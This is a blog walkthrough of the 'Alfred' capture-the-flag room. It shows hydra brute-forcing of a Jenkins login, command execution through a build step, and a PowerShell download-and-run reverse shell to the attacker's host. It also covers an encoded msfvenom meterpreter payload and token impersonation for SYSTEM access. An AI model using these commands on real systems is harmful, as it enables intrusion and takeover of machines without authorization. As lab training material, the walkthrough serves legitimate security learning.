Posts Alfred
Post
Cancel

Alfred

Click here if you’re interested in the room!

This guide is meant to be used as a supplement for learning, please tackle this on your own before reading this!

  1. How many TCP ports are open?
  2. What is the username and password for the log in panel?
  3. Find a feature of the tool that allows you to execute commands on the underlying system.
  4. What is the user.txt flag?
  5. Switching shells
  6. Size of the payload
  7. Token Impersonation
  8. Output of guid command
  9. Migrating and finding root.txt

1) The first question asks for the number of TCP ports open, we can use a nmap scan for this.

1
nmap -vv -sC -sV -A -Pn -oN nmap.log {target_ip_here}

image image

2) What is the username and password for the log in panel(in the format username:password)

Seems like port 8080 is open so lets navigate to that. image

Navigating to the target ip at port 8080 brings us to a login page for [Jenkins] image

Viewing the page source doesn’t seem to give any hidden credentials, so we will need to be bruteforcing credentials.

I will be using hydra for this.

First, I’ll be using BurpSuite to intercept the login request. We can see that it is a http post request along with the required parameters circled in red. image

It seems like both the username and pass are 5 words long, I’ll be using hydra to bruteforce credentials. I will be making a copy of a username text file and a password textfile that are only five characters long from seclists. image image

using hydra to bruteforce credentials

1
hydra -L five_c_user.txt -P five_c_pass.txt -s 8080 {target_ip} http-post-form "j/acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password

Success we can now login with our new credentials!

image

3) Find a feature of the tool that allows you to execute commands on the underlying system.

Peering around the website we go into the project -> configure -> build and we are presented with something that looks like a CLI. image

If we save and build the project again, we can see the whoami command is invoked in the latest build. image

Seems like we can gain access to the machine using a reverse shell.

Let’s grab Nishang’s TCP reverse shell script

1
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Next, we’ll need to host a http.server so the server can download the powershell file. (default port 8000)

1
python3 -m http.server

We will also need to open a netcat listener for the reverse shell, I will be using a wrapper called rlwrap along with nc to do this.

1
rlwrap nc -lvnp 4444

Run the powerline command in the room. The first download port should be the http.server port (8000) and the other port should be the nc reverse shell listener port (4444 in my case) Then click build now.

1
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

4) What is the user.txt flag?

We should be connected to our reverse shell after invoking the build. image

We’re looking for a user.txt file, so lets run the equivalent find command in powershell

1
Get-Childitem -Path C:\ -Include *user.txt* -Recurse -ErrorAction SilentlyContinue

Seems like we got a match!

image

Success!

image

image

5) Switching shells

Using nc for a reverse shell is usually unstable or very buggy so using Metasploit to gain a meterpreter shell will give us a more full-fleshed shell experience.

Use msfvenom to generate a payload for the windows reverse shell (Im naming it as hello.exe):

1
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o hello.exe

Host a python server on your local machine:

1
  python3 -m http.server

Use the following command on our netcat reverse shell:

1
  powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/hello.exe','hello.exe')"

Seems like the powershell command successfully downloaded our payload. image

Now we have to setup our handler in Metasploit

1
2
3
4
5
  use exploit/multi/handler
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST your-ip
  set LPORT listening-port
  run

image

Finally we are ready to execute the program. Enter this command in the powershell:

1
  Start-Process "hello.exe"

Sucessfully connected.

image

6) What is the size of the payload

image

7) Token Impersonation

Now that we’re in the meterpreter shell, lets switch to powershell before executing the following commands.

1
2
3
  use powershell
  powershell_shell
  whoami /priv

We can use the incognito module to exploit these two privileges. image

Exit out of powershell and execute in the meterpreter shell:

image

List all tokens then impersonate the Administrators token.

1
  list_tokens -g

image

8) Output of guid

image

9) Migrating and finding root.txt

Use the command ps and find the PID of services.exe in red

image

Migrate to services.exe

image

Find root.txt and the flag.

image

image

Congratulations, the room is now complete! Hopefully, this guide was helpful for anyone stuck in this room.

This post is licensed under CC BY 4.0 by the author.
Recent Update
Trending Tags
Contents

Trending Tags